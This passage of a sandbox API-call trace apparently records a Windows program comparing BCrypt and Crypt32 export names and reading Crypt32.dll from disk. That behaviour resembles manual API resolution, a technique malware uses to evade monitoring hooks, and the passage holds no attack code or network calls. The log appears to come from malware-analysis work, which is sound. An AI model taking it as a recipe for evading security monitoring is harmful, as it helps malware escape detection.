(lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0149.969] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0149.969] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.969] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.969] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0149.969] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0149.970] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0149.971] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0149.972] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0149.972] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0149.972] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0149.972] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0149.972] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0149.972] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0149.972] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.972] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.972] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0149.972] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0149.972] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0149.972] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0149.973] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0149.974] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0149.974] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0149.974] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0149.974] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0149.974] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0149.974] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0149.974] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0149.975] GetProcessHeap () returned 0x520000 [0149.975] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d62010 | out: hHeap=0x520000) returned 1 [0149.975] GetProcessHeap () returned 0x520000 [0149.975] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5397e0 [0149.976] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0150.116] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0150.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0150.117] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0150.117] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0150.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0150.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0150.118] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0150.118] GetProcessHeap () returned 0x520000 [0150.118] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1c30e0) returned 0x4127040 [0150.123] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0150.123] ReadFile (in: hFile=0x160, lpBuffer=0x4127040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4127040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0150.279] CloseHandle (hObject=0x160) returned 1 [0150.279] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0150.280] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0150.280] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0150.280] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0150.280] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0150.280] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0150.280] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0150.280] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0150.280] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0150.280] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0150.280] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0150.280] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0150.280] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0150.280] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0150.280] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0150.280] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0150.280] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0150.280] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0150.280] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0150.280] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0150.280] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0150.280] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0150.281] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0150.281] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0150.281] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0150.282] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0150.283] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0150.283] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0150.283] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0150.284] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0150.284] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.284] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0150.284] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0150.285] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0150.285] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0150.285] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0150.285] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0150.285] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0150.285] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0150.286] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0150.286] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertCloseServerOcspResponse", 